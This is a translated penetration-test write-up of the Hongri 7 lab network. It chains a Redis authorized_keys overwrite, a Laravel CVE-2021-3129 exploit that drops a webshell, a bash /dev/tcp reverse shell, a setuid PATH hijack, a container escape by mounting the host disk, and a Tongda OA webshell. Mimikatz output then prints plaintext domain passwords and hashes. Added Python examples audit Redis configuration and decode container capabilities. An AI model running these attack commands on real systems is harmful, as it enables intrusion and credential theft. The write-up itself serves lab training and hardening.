红日7 (Hongri 7) Write-up

Network topology diagram

External footprinting

Initial information gathering with fscan

The scan shows a Redis instance that allows unauthenticated access.

We can connect to it directly, so the next step is to write an SSH public key through it.

Machine 1

We attack through the unauthenticated Redis instance found by the scan.

Generate a key pair: ssh-keygen -t rsa

Write the public key to a file, padded with blank lines so that it lands on its own line inside the dump: (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt

Store it in Redis as a value: cat key.txt | redis-cli -h 192.168.111.20 -x set xxx

Then, inside redis-cli:
config set dir /root/.ssh/              # point the dump directory at /root/.ssh/
config set dbfilename authorized_keys   # name the dump file authorized_keys
save                                    # writes the dataset, including the key value, into authorized_keys
exit                                    # quit
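The chain above depends on three conditions holding at once: the instance is reachable from the network, it requires no password, and CONFIG SET and SAVE are available to whoever connects. The following is an added example (not code from the original post or from Redis) that audits a redis.conf for exactly those conditions and shows a weak configuration beside a hardened one. It handles plain `directive value` lines only (no `include`), and both configurations in it are constructed samples.

```python
"""Audit a redis.conf for the settings that make the authorized_keys overwrite possible.

Added example for this write-up (not part of the original post or of Redis). The two
configurations at the bottom are constructed samples.
"""

# Commands an unauthenticated client needs to turn a key write into a file write.
FILE_WRITE_COMMANDS = ("config", "save", "bgsave")


def parse_redis_conf(text: str) -> dict:
    """Minimal redis.conf parser. Returns {'settings': {...}, 'renamed': {...}}.

    'rename-command CONFIG ""' disables CONFIG; any other new name is recorded as-is.
    """
    settings, renamed = {}, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        key = parts[0].lower()
        if key == "rename-command" and len(parts) == 3:
            renamed[parts[1].lower()] = parts[2].strip('"')
        elif key == "bind":
            settings.setdefault("bind", []).extend(parts[1:])
        else:
            settings[key] = " ".join(parts[1:])
    return {"settings": settings, "renamed": renamed}


def audit_redis_conf(text: str) -> list:
    """Return the weak points in the chain: reachable -> no auth -> CONFIG SET dir/dbfilename -> SAVE."""
    conf = parse_redis_conf(text)
    s, renamed = conf["settings"], conf["renamed"]
    findings = []

    binds = s.get("bind", [])
    if not binds or any(a in ("0.0.0.0", "*", "::", "-::*") for a in binds):
        findings.append("bind: listens on all interfaces; bind to 127.0.0.1 or an internal address")
    # protected-mode exists since Redis 3.2 and defaults to yes when the directive is absent.
    if s.get("protected-mode", "yes").lower() == "no":
        findings.append("protected-mode no: remote clients are accepted without authentication")
    if not s.get("requirepass"):
        findings.append("requirepass unset: any client can run CONFIG SET and SAVE")
    for cmd in FILE_WRITE_COMMANDS:
        if cmd not in renamed:
            findings.append(f"{cmd.upper()} not renamed or disabled: the RDB dump can be redirected to /root/.ssh/")
    return findings


WEAK_CONF = """
# constructed sample: an instance like the one found by the scan
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
dbfilename dump.rdb
"""

HARDENED_CONF = """
# constructed sample: the same instance after hardening
bind 127.0.0.1
protected-mode yes
port 6379
requirepass CHANGE-ME-long-random-secret
rename-command CONFIG ""
rename-command SAVE ""
rename-command BGSAVE ""
dir /var/lib/redis
dbfilename dump.rdb
"""

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        findings = audit_redis_conf(conf)
        print(f"{name}: {len(findings)} finding(s)")
        for f in findings:
            print("  -", f)
```

Disabling CONFIG alone is not enough if the attacker already has a dump directory under /root: the SAVE family is renamed too, and requirepass closes the door for anyone who only has network reach.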

We use vshell to generate a bind (forward-connect) client, upload it to the host and connect to it.

Once it checks in to vshell, this target is ours.

Internal network information gathering

./fscan.x64.elf -h 192.168.52.10/24

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 192.168.52.10 is alive
(icmp) Target 192.168.52.20 is alive
(icmp) Target 192.168.52.30 is alive
[*] Icmp alive hosts len is: 3
192.168.52.30:445 open
192.168.52.30:139 open
192.168.52.30:135 open
192.168.52.10:81 open
192.168.52.10:80 open
192.168.52.20:22 open
192.168.52.10:22 open
192.168.52.30:8080 open
192.168.52.20:8000 open
192.168.52.10:6379 open
[*] alive ports len is: 10
start vulscan
[*] WebTitle: http://192.168.52.10 code:502 len:584 title:502 Bad Gateway
[+] Redis:192.168.52.10:6379 unauthorized file:/root/.ssh/authorized_keys
[+] Redis:192.168.52.10:6379 like can write /root/.ssh/
[+] Redis:192.168.52.10:6379 like can write /var/spool/cron/
[*] WebTitle: http://192.168.52.30:8080 code:200 len:10065 title:通达OA网络智能办公系统
[*] NetBios: 192.168.52.30 PC1.whoamianony.org Windows 7 Professional 7601 Service Pack 1
[+] 192.168.52.30 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[*] WebTitle: http://192.168.52.20:8000 code:200 len:17474 title:Laravel
[+] InfoScan:http://192.168.52.30:8080 [通达OA]
[*] WebTitle: http://192.168.52.10:81 code:200 len:17474 title:Laravel
[+] http://192.168.52.30:8080 tongda-user-session-disclosure
[+] InfoScan:http://192.168.52.20:8000 [Laravel]
[+] SSH:192.168.52.10:22:root 123456
[+] InfoScan:http://192.168.52.10:81 [Laravel]
[+] http://192.168.52.20:8000 poc-yaml-laravel-cve-2021-3129
[+] http://192.168.52.10:81 poc-yaml-laravel-cve-2021-3129
已完成 9/10 [-] ssh 192.168.52.20:22 root password ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 9/10 [-] ssh 192.168.52.20:22 root 1 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain

After uploading fscan and scanning the subnet of the second network interface, we find two more hosts, and the scan pulls a lot of information from them, for example:

http://192.168.52.10:81 poc-yaml-laravel-cve-2021-3129

That is what we analyze next.

Machine 2

The earlier fscan output reported a CVE on this host.

Exploitation

We download a public exploit and upload it to run against the target:

ajisai-babu/CVE-2021-3129-exp: Laravel Debug mode RCE vulnerability (CVE-2021-3129) poc / exp

python CVE-2021-3129.py -u http://192.168.52.10:81 --exp -p socks5://192.168.113.154:1001
[✅]检测到漏洞![🚩]url: http://192.168.52.10:81 [❇️info]PHP版本:7.4.14 网站路径:/var/www/html 服务器地址:172.17.0.2 系统版本:Linux 8e172820ac78 4.4.0-142-generic #168~14.04.1-Ubuntu SMP Sat Jan 19 11:26:28 UTC 2019 x86_64
[OK] 成功写入webshell, 访问地址 http://192.168.52.10:81/shell.php , 密码 whoami

Connecting with AntSword (蚁剑) shows that we are inside a Docker container.

So we gather some information.

Next we get a stable shell by reverse-connecting to the web1 host:

(www-data:/bin) $ bash -c 'bash -i > /dev/tcp/192.168.52.10/4444 0<&1 2>&1'

ls -al confirms that we are inside a Docker container: the .dockerenv file is present.

Docker escape

Docker escapes usually rely on container misconfiguration or on known historical Docker vulnerabilities. We first check the container's configuration: whether it runs in privileged mode, and whether there are any dangerous mounts.

www-data@8e172820ac78:/bin$ cat /proc/self/status |grep Cap
cat /proc/self/status |grep Cap
CapInh: 0000003fffffffff
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000

CapEff is 0000000000000000 rather than something of the form 000000xfffffffff, so this is probably not a privileged container.

However, the routine check find / -perm -u=s -type f 2>/dev/null turns up something else.

Looking for setuid files

www-data@8e172820ac78:/$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/sudo
/home/jobs/shell
/bin/mount
/bin/su
/bin/umount

The file /home/jobs/shell stands out as suspicious.

Let's look at it.

It is an ELF binary; running it shows that it executes the ps command.

The same directory also contains a demo.c file and an ls file; demo.c looks like the source:

#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid(), setgid() */

int main(void)
{
    setuid(0);
    setgid(0);
    system("ps");     /* relative command name: resolved through the caller's PATH */
    return 0;
}

The key line is system("ps"): the binary runs the ps command. If we could change that line and recompile we would be done,

but we do not have permission to compile demo.c, so we need another approach.

www-data@8e172820ac78:/home/jobs$ ls -l
ls -l
total 24
-rw-r--r-- 1 root root 75 Feb 25 2021 demo.c
-rwsr-xr-x 1 root root 16712 Feb 25 2021 shell

Let's see whether we can forge a ps and escalate privileges by modifying the PATH environment variable.

cd /tmp
echo "/bin/bash" > ps        # create a file named ps in /tmp that spawns a shell
chmod 777 ps                 # make it executable by everyone
echo $PATH                   # show the current PATH
export PATH=/tmp:$PATH       # prepend /tmp to PATH
cd /home/jobs                # back to the directory containing shell
./shell                      # run it

We now have root, but remember that we are still inside a Docker container. The current shell is awkward to use, so we upgrade it with a trick learned from another blog:

python -c 'import pty; pty.spawn("/bin/bash")'

Now let's inspect the container again.

root@8e172820ac78:/home/jobs#  cat /proc/self/status |grep Cap
cat /proc/self/status |grep Cap
CapInh: 0000003fffffffff
CapPrm: 0000003fffffffff
CapEff: 0000003fffffffff
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000

It is indeed a privileged container, which makes the escape straightforward.
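The two capability dumps above (first as www-data, then as root) are worth decoding rather than eyeballing: whether a container is privileged should be read from CapBnd, not CapEff. A process running under a non-root uid gets empty permitted and effective sets regardless of how the container was started, so the first dump already showed the full bounding set (0x3fffffffff, all 38 capabilities of a 4.4 kernel) and with it CAP_SYS_ADMIN, which is what the mount step that follows relies on. The following is an added example (not code from the original post) that parses both dumps; the capability name table and the list of Docker's 14 traditional default capabilities are standard values, not taken from the page.

```python
"""Decode the Cap* lines of /proc/<pid>/status and judge whether a container is privileged.

Added example for this write-up (not code from the original post). The two status
excerpts are the ones captured above; the name table is the Linux capability list
for kernels up to 4.4 (38 capabilities, bits 0-37), matching the 0x3fffffffff mask seen.
"""

CAP_NAMES = [
    "chown", "dac_override", "dac_read_search", "fowner", "fsetid", "kill",
    "setgid", "setuid", "setpcap", "linux_immutable", "net_bind_service",
    "net_broadcast", "net_admin", "net_raw", "ipc_lock", "ipc_owner",
    "sys_module", "sys_rawio", "sys_chroot", "sys_ptrace", "sys_pacct",
    "sys_admin", "sys_boot", "sys_nice", "sys_resource", "sys_time",
    "sys_tty_config", "mknod", "lease", "audit_write", "audit_control",
    "setfcap", "mac_override", "mac_admin", "syslog", "wake_alarm",
    "block_suspend", "audit_read",
]
FULL_MASK = (1 << len(CAP_NAMES)) - 1   # 0x3fffffffff on a 4.4 kernel

# The 14 capabilities Docker has traditionally granted to an unprivileged container.
DOCKER_DEFAULT = {
    "chown", "dac_override", "fsetid", "fowner", "mknod", "net_raw", "setgid",
    "setuid", "setfcap", "setpcap", "net_bind_service", "sys_chroot", "kill",
    "audit_write",
}


def parse_cap_lines(status_text: str) -> dict:
    """Return {'CapInh': int, 'CapPrm': int, ...} from /proc/self/status text."""
    caps = {}
    for line in status_text.splitlines():
        if line.startswith("Cap"):
            key, _, value = line.partition(":")
            caps[key.strip()] = int(value.strip(), 16)
    return caps


def decode_mask(mask: int) -> list:
    """Translate a capability bitmask into capability names (bit i -> CAP_NAMES[i])."""
    return [name for bit, name in enumerate(CAP_NAMES) if mask >> bit & 1]


def assess_container(status_text: str) -> dict:
    """Privileged means the bounding set is the full set; CapEff only reflects the current uid."""
    caps = parse_cap_lines(status_text)
    bounding = set(decode_mask(caps.get("CapBnd", 0)))
    effective = set(decode_mask(caps.get("CapEff", 0)))
    return {
        "privileged": caps.get("CapBnd", 0) == FULL_MASK,
        "beyond_docker_default": sorted(bounding - DOCKER_DEFAULT),
        "effective_count": len(effective),
        # CAP_SYS_ADMIN in the bounding set is what root needs for mount(2) on the host disk.
        "sys_admin_reachable": "sys_admin" in bounding,
    }


# Captured above as www-data (before the setuid escalation).
WWW_DATA_STATUS = """\
CapInh: 0000003fffffffff
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
"""

# Captured above as root (after the escalation).
ROOT_STATUS = """\
CapInh: 0000003fffffffff
CapPrm: 0000003fffffffff
CapEff: 0000003fffffffff
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
"""

if __name__ == "__main__":
    for label, text in (("www-data", WWW_DATA_STATUS), ("root", ROOT_STATUS)):
        r = assess_container(text)
        print(f"{label}: privileged={r['privileged']} effective={r['effective_count']} "
              f"beyond_default={len(r['beyond_docker_default'])} sys_admin={r['sys_admin_reachable']}")
```

Both dumps come out as privileged with 24 capabilities beyond Docker's default set; only the effective count differs (0 versus 38). Running the same check against a container started without --privileged gives a 14-entry bounding set and no sys_admin, which is the configuration that would have stopped the mount-based escape below.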

root@8e172820ac78:/home/jobs# fdisk -l
fdisk -l
Disk /dev/sda: 10 GiB, 10737418240 bytes, 20971520 sectors
Disk model: VMware Virtual S
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x00063af9

Device Boot Start End Sectors Size Id Type
/dev/sda1 * 2048 16779263 16777216 8G 83 Linux
/dev/sda2 16781310 20969471 4188162 2G 5 Extended
/dev/sda5 16781312 20969471 4188160 2G 82 Linux swap / Solaris

Now we can escape by mounting the host disk:

root@8e172820ac78:/# mkdir 123
mkdir 123
root@8e172820ac78:/# mount /dev/sda1 /123
mount /dev/sda1 /123
root@8e172820ac78:/# ls
ls
123 boot etc home lib64 mnt proc run srv tmp var
bin dev hack lib media opt root sbin sys usr

Then we append the first machine's public key to the host's authorized_keys:

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDBaz1SULVLesFG1OM3IvBugUvcDb2zalFv0yr8Y7pkTxv3B3vV37JiZ1nZdtlfTRxk7SuxRC75ornKhNNaTxI6lBWtjo2kmFnb9Y6E1YZ3r1VvP3tofRRZUa2S1lC96CzdF9Uv9+ehag5pUwoSr2B5zv6WuFX2eIaOq2ZR9z3qAEWPAyzszr/0Rv7RISk8W3QFzlu0mE/ln/iPJVHnKz/jSn6xfFR11zxDjn0D4Qyj1WmcUshfyKSp8TuFIC+5Lj51KUE4wMJe+ee2QJJKtl1GwO/nlDtFqYtjR1WR48HSAc2nnUO5mi7Iq2WWaL5aeSEeMEaMaTZuipznZSpdIuSV root@ubuntu
" >> /123/root/.ssh/authorized_keys

Then we connect from the first machine using the key pair generated there:

root@ubuntu:~/.ssh# ssh -i id_rsa root@192.168.52.20
Welcome to Ubuntu 14.04.6 LTS (GNU/Linux 4.4.0-142-generic x86_64)

* Documentation: https://help.ubuntu.com/

Your Hardware Enablement Stack (HWE) is supported until April 2019.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

We bring this host onto vshell with a bind connection as before.

Machine 3

root@ubuntu:/# ./fscan.x64.elf -h 192.168.52.30

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 192.168.52.30 is alive
[*] Icmp alive hosts len is: 1
192.168.52.30:8080 open
192.168.52.30:445 open
192.168.52.30:139 open
192.168.52.30:135 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle: http://192.168.52.30:8080 code:200 len:10065 title:通达OA网络智能办公系统
[*] NetBios: 192.168.52.30 PC1.whoamianony.org Windows 7 Professional 7601 Service Pack 1
[+] 192.168.52.30 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[+] InfoScan:http://192.168.52.30:8080 [通达OA]
[+] http://192.168.52.30:8080 tongda-user-session-disclosure
已完成 4/4
[*] 扫描结束,耗时: 8.147811558s
root@ubuntu:/#

The third machine runs a Tongda OA (通达OA) service; let's take a look.

A Tongda OA vulnerability scanner confirms that the site is vulnerable.


The scanner reports a file upload vulnerability, which we use to upload a webshell.

Then we connect with AntSword.

This is a Windows host.

As before, we generate a Windows bind-connection client with vshell, upload it and bring the host onto vshell.

Internal network information gathering:

We use the mimikatz bundled with vshell:

[06/02 20:11:27] beacon> logonpasswords
[06/02 20:11:27] [*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[06/02 20:11:27] [+] host called home, sent: 297594 bytes
[06/02 20:11:28] [+] received output:

Authentication Id : 0 ; 13022187 (00000000:00c6b3eb)
Session : CachedInteractive from 1
User Name : Administrator
Domain : WHOAMIANONY
Logon Server : DC
Logon Time : 2026/6/2 17:09:00
SID : S-1-5-21-1315137663-3706837544-1429009142-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : WHOAMIANONY
* LM : 56b0cd8b125c05055e2dd9e955f18034
* NTLM : ab89b1295e69d353dd7614c7a3a80cec
* SHA1 : 2bc4124300a6a8fc0ca10891823d36c64e4b3a40
tspkg :
* Username : Administrator
* Domain : WHOAMIANONY
* Password : Whoami2021
wdigest :
* Username : Administrator
* Domain : WHOAMIANONY
* Password : Whoami2021
kerberos :
* Username : Administrator
* Domain : WHOAMIANONY.ORG
* Password : Whoami2021
ssp :
credman :

Authentication Id : 0 ; 1956007 (00000000:001dd8a7)
Session : CachedInteractive from 1
User Name : Administrator
Domain : WHOAMIANONY
Logon Server : DC
Logon Time : 2026/5/31 14:35:46
SID : S-1-5-21-1315137663-3706837544-1429009142-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : WHOAMIANONY
* LM : 56b0cd8b125c05055e2dd9e955f18034
* NTLM : ab89b1295e69d353dd7614c7a3a80cec
* SHA1 : 2bc4124300a6a8fc0ca10891823d36c64e4b3a40
tspkg :
* Username : Administrator
* Domain : WHOAMIANONY
* Password : Whoami2021
wdigest :
* Username : Administrator
* Domain : WHOAMIANONY
* Password : Whoami2021
kerberos :
* Username : Administrator
* Domain : WHOAMIANONY.ORG
* Password : Whoami2021
ssp :
credman :

Authentication Id : 0 ; 1440229 (00000000:0015f9e5)
Session : Interactive from 1
User Name : bunny
Domain : WHOAMIANONY
Logon Server : DC
Logon Time : 2026/5/31 14:30:39
SID : S-1-5-21-1315137663-3706837544-1429009142-1112
msv :
[00000003] Primary
* Username : bunny
* Domain : WHOAMIANONY
* LM : 7de10bf327ef7f2ac6ebe8776a153feb
* NTLM : cc567d5556030b7356ee4915ff098c8f
* SHA1 : 3747632756191e3350e53211c63f804eb163638f
tspkg :
* Username : bunny
* Domain : WHOAMIANONY
* Password : Bunny2021
wdigest :
* Username : bunny
* Domain : WHOAMIANONY
* Password : Bunny2021
kerberos :
* Username : bunny
* Domain : WHOAMIANONY.ORG
* Password : Bunny2021
ssp :
credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2026/5/31 14:28:29
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : PC1$
Domain : WHOAMIANONY
Logon Server : (null)
Logon Time : 2026/5/31 14:28:29
SID : S-1-5-20
msv :
[00000003] Primary
* Username : PC1$
* Domain : WHOAMIANONY
* NTLM : 3e6a3d8c713b4821eaa51aab25f52074
* SHA1 : d8e1318a24c64b8fcc89dc8609b09af50342bacf
tspkg :
wdigest :
* Username : PC1$
* Domain : WHOAMIANONY
* Password : %Yn!@ZW,eWz5>[!hh;H.(&n(yh^2YADmU*2bVx<N#yvw.9MTwmi;84''uRaucL)mw7I42S>sUE#r&u]vz6\/:5A.s5nLrko+zfn@])/"$V6?sDZel=f>[ol;
kerberos :
* Username : pc1$
* Domain : whoamianony.org
* Password : %Yn!@ZW,eWz5>[!hh;H.(&n(yh^2YADmU*2bVx<N#yvw.9MTwmi;84''uRaucL)mw7I42S>sUE#r&u]vz6\/:5A.s5nLrko+zfn@])/"$V6?sDZel=f>[ol;
ssp :
credman :

Authentication Id : 0 ; 50798 (00000000:0000c66e)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2026/5/31 14:28:29
SID :
msv :
[00000003] Primary
* Username : PC1$
* Domain : WHOAMIANONY
* NTLM : 3e6a3d8c713b4821eaa51aab25f52074
* SHA1 : d8e1318a24c64b8fcc89dc8609b09af50342bacf
tspkg :
wdigest :
kerberos :
ssp :
credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : PC1$
Domain : WHOAMIANONY
Logon Server : (null)
Logon Time : 2026/5/31 14:28:29
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : PC1$
* Domain : WHOAMIANONY
* Password : %Yn!@ZW,eWz5>[!hh;H.(&n(yh^2YADmU*2bVx<N#yvw.9MTwmi;84''uRaucL)mw7I42S>sUE#r&u]vz6\/:5A.s5nLrko+zfn@])/"$V6?sDZel=f>[ol;
kerberos :
* Username : pc1$
* Domain : WHOAMIANONY.ORG
* Password : %Yn!@ZW,eWz5>[!hh;H.(&n(yh^2YADmU*2bVx<N#yvw.9MTwmi;84''uRaucL)mw7I42S>sUE#r&u]vz6\/:5A.s5nLrko+zfn@])/"$V6?sDZel=f>[ol;
ssp :
credman :
From the plaintext credentials captured above we can see the domain controller's account and password:
Windows Administrator Whoami2021
Windows whoami Whoami2021
Windows bunny Bunny2021

We also collect the network interface information:

C:\>ipconfig

Windows IP 配置


以太网适配器 本地连接 4:

连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::e891:67e5:e7ce:34c6%23
IPv4 地址 . . . . . . . . . . . . : 192.168.93.20
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . :

以太网适配器 Npcap Loopback Adapter:

连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::b461:ccad:e30f:81ba%22
自动配置 IPv4 地址 . . . . . . . : 169.254.129.186
子网掩码 . . . . . . . . . . . . : 255.255.0.0
默认网关. . . . . . . . . . . . . :

以太网适配器 本地连接:

连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::90ef:688f:b9a8:fe03%11
IPv4 地址 . . . . . . . . . . . . : 192.168.52.30
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 192.168.52.2

隧道适配器 isatap.{4DAEBDFD-0177-4691-8243-B73297E2F0FF}:

媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :

隧道适配器 isatap.{55ECD929-FBB2-4D96-B43D-8FFEB14A169F}:

媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :

隧道适配器 isatap.{EC57C4EB-763E-4000-9CDE-4D7FF15DF74C}:

媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :

There is another subnet, so we scan it with fscan:

C:\>fscan.exe -h 192.168.93.20/24
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.1

[2026-06-14 23:40:29] [INFO] 开始信息扫描
[2026-06-14 23:40:30] [INFO] CIDR范围: 192.168.93.0-192.168.93.255
[2026-06-14 23:40:30] [INFO] generate_ip_range_full
[2026-06-14 23:40:30] [INFO] 解析CIDR 192.168.93.20/24 -> IP范围 192.168.93.0-192.168.93.255
[2026-06-14 23:40:31] [INFO] 最终有效主机数量: 256
[2026-06-14 23:40:31] [INFO] 开始主机扫描
[2026-06-14 23:40:31] [INFO] 使用所有可用插件(已排除本地敏感插件)
[2026-06-14 23:40:32] [SUCCESS] 目标 192.168.93.10 存活 (ICMP)
[2026-06-14 23:40:32] [SUCCESS] 目标 192.168.93.20 存活 (ICMP)
[2026-06-14 23:40:33] [SUCCESS] 目标 192.168.93.30 存活 (ICMP)
[2026-06-14 23:40:33] [SUCCESS] 目标 192.168.93.40 存活 (ICMP)
[2026-06-14 23:40:39] [INFO] 存活主机数量: 4
[2026-06-14 23:40:40] [INFO] 有效端口数量: 233
[2026-06-14 23:40:40] [SUCCESS] 端口开放 192.168.93.10:22
[2026-06-14 23:40:41] [SUCCESS] 端口开放 192.168.93.10:80
[2026-06-14 23:40:46] [SUCCESS] 端口开放 192.168.93.30:88
[2026-06-14 23:40:50] [SUCCESS] 端口开放 192.168.93.20:110
[2026-06-14 23:40:51] [SUCCESS] 端口开放 192.168.93.20:135
[2026-06-14 23:40:51] [SUCCESS] 端口开放 192.168.93.20:139
[2026-06-14 23:40:51] [SUCCESS] 端口开放 192.168.93.40:135
[2026-06-14 23:40:51] [SUCCESS] 端口开放 192.168.93.30:135
[2026-06-14 23:40:52] [SUCCESS] 端口开放 192.168.93.30:139
[2026-06-14 23:40:52] [SUCCESS] 端口开放 192.168.93.40:139
[2026-06-14 23:40:52] [SUCCESS] 端口开放 192.168.93.30:389
[2026-06-14 23:40:53] [SUCCESS] 端口开放 192.168.93.20:445
[2026-06-14 23:40:53] [SUCCESS] 端口开放 192.168.93.30:445
[2026-06-14 23:40:54] [SUCCESS] 端口开放 192.168.93.40:445
[2026-06-14 23:41:30] [SUCCESS] 端口开放 192.168.93.10:8000
[2026-06-14 23:41:46] [SUCCESS] 端口开放 192.168.93.20:8080
[2026-06-14 23:43:08] [INFO] 存活端口数量: 16
[2026-06-14 23:43:08] [INFO] 开始漏洞扫描
[2026-06-14 23:43:09] [SUCCESS] NetInfo 扫描结果
目标主机: 192.168.93.30
主机名: DC
发现的网络接口:
IPv4地址:
└─ 192.168.93.30
[2026-06-14 23:43:09] [SUCCESS] NetInfo 扫描结果
目标主机: 192.168.93.40
主机名: PC2
发现的网络接口:
IPv4地址:
└─ 192.168.93.40
[2026-06-14 23:43:09] [SUCCESS] NetInfo 扫描结果
目标主机: 192.168.93.20
主机名: PC1
发现的网络接口:
IPv4地址:
└─ 192.168.52.30
[2026-06-14 23:43:10] [SUCCESS] NetBios 192.168.93.30 DC:DC.whoamianony.org Windows Server 2012 R2 Datacenter 9600
[2026-06-14 23:43:10] [SUCCESS] 发现漏洞 192.168.93.20 [Windows 7 Professional 7601 Service Pack 1] MS17-010
[2026-06-14 23:43:10] [SUCCESS] NetBios 192.168.93.40 PC2.whoamianony.org Windows 7 Professional 7601 Service Pack 1
[2026-06-14 23:43:11] [SUCCESS] 发现漏洞 192.168.93.30 [Windows Server 2012 R2 Datacenter 9600] MS17-010
[2026-06-14 23:43:13] [SUCCESS] 发现漏洞 192.168.93.40 [Windows 7 Professional 7601 Service Pack 1] MS17-010
[2026-06-14 23:43:16] [SUCCESS] 网站标题 http://192.168.93.10:8000 状态码:200 长度:17474 标题:Laravel
[2026-06-14 23:43:17] [SUCCESS] 发现指纹 目标: http://192.168.93.10:8000 指纹: [Laravel]
[2026-06-14 23:46:09] [SUCCESS] 扫描已完成: 29/29
C:\>fscan.exe -h 169.254.129.186/24
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.1

[2026-06-14 23:49:04] [INFO] 开始信息扫描
[2026-06-14 23:49:05] [INFO] CIDR范围: 169.254.129.0-169.254.129.255
[2026-06-14 23:49:05] [INFO] generate_ip_range_full
[2026-06-14 23:49:05] [INFO] 解析CIDR 169.254.129.186/24 -> IP范围 169.254.129.0-169.254.129.255
[2026-06-14 23:49:06] [INFO] 最终有效主机数量: 256
[2026-06-14 23:49:06] [INFO] 开始主机扫描
[2026-06-14 23:49:06] [INFO] 使用所有可用插件(已排除本地敏感插件)
[2026-06-14 23:49:07] [SUCCESS] 目标 169.254.129.186 存活 (ICMP)
[2026-06-14 23:49:13] [INFO] 存活主机数量: 1
[2026-06-14 23:49:13] [INFO] 有效端口数量: 233
[2026-06-14 23:49:15] [SUCCESS] 端口开放 169.254.129.186:135
[2026-06-14 23:49:15] [SUCCESS] 端口开放 169.254.129.186:110
[2026-06-14 23:49:15] [SUCCESS] 端口开放 169.254.129.186:139
[2026-06-14 23:49:16] [SUCCESS] 端口开放 169.254.129.186:445
[2026-06-14 23:49:25] [SUCCESS] 端口开放 169.254.129.186:8080
[2026-06-14 23:49:40] [INFO] 存活端口数量: 5
[2026-06-14 23:49:40] [INFO] 开始漏洞扫描
[2026-06-14 23:49:40] [SUCCESS] 发现漏洞 169.254.129.186 [Windows 7 Professional 7601 Service Pack 1] MS17-010
[2026-06-14 23:49:40] [SUCCESS] NetInfo 扫描结果
目标主机: 169.254.129.186
主机名: PC1
发现的网络接口:
IPv4地址:
└─ 192.168.52.30

From this we infer that the 192.168.93.0 segment is the one shared with the second machine, while the other segment contains only this host itself, so the focus should be on 192.168.93.30 and 192.168.93.40. We already captured plaintext credentials earlier, and since .30 has port 88 open it is most likely the domain controller.

Both hosts are also reported as vulnerable to MS17-010 (EternalBlue).
